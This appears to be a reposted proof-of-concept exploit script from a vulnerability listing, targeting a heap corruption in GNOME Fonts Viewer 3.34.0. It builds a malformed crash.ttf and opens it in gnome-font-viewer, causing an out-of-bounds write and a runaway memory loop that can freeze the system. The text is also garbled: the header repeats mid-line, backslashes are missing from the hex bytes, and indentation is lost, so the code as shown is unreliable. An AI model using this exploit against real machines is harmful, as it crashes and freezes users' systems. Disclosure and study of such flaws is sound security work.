Gnome Fonts Viewer 3.34.0 Heap Corruption

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 218

#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Lin #!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.

from os import system

this_pattern = "BEEF"*21125 # needs to be filled to len ~84500

# TTF file header (probably has some junk data in it) taken from MesloLGS
NF Regular.ttf

ttf_header = ("x00x01x00x00x00x13x01x00x00x04x00x30x46x46x54"
"x4dx75xfex73xddx00x13xb6x0cx00x00x00x1cx47x44x45"
"x46x4dx76x5dxdax00x13xb0xacx00x00x04xaax47x50x4f"
"x53x44x76x4cx75x00x13xb5xecx00x00x00x20x47x53x55"
"x42x09xf6x0bxdcx00x13xb5x58x00x00x00x92x4fx53x2f"
"x32x8dxbdx8ex75x00x00x01xb8x00x00x00x60x50x66x45"
"x64x5bxd3xe9x6bx00x13xb6x28x00x00x02x50x63x6dx61"
"x70xbfx0dx76x7cx00x00x34x30x00x00x0ax36x63x76x74"
"x20x28xfdx02x16x00x00x48x98x00x00x00x38x66x70x67"
"x6dx31xfcxa0x95x00x00x3ex68x00x00x09x96x67x61x73"
"x70xffxffx00x10x00x13xb0xa4x00x00x00x08x67x6cx79"
"x66xd6x2fx24x7cx00x00xacxf0x00x11xd8x34x68x65x61"
"x64x04xe3x81x66x00x00x01x3cx00x00x00x36x68x68x65"
"x61x0axf4x01xa2x00x00x01x74x00x00x00x24x68x6dx74"
"x78x93xdfx7ex92x00x00x02x18x00x00x32x16x6cx6fx63"
"x61xe6x44x45x24x00x00x48xd0x00x00x64x20x6dx61x78"
"x70x1axa2x0bx9cx00x00x01x98x00x00x00x20x6ex61x6d"
"x65x62x13x17xa4x00x12x85x24x00x00x0bx9dx70x6fx73"
"x74xbbxe8x29xcfx00x12x90xc4x00x01x1fxddx70x72x65"
"x70xb4xc5xc5x72x00x00x48x00x00x00x00x95x00x01x00"
"x00x00x02x07x2bxd0x81xfcx0fx5fx0fx3cxf5x02x9fx08"
"x00x00x00x00x00xc5x74x19x33x00x00x00x00xdax9dx14"
"xf1xfdx41xfcxfcx05xdfx0a")

print('[+] Generating crash.ttf with DEADDEAD')

with open("./crash.ttf", 'w') as f:
f.write(ttf_header)
f.write(this_pattern)
f.close()
print('[+] Done')

print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")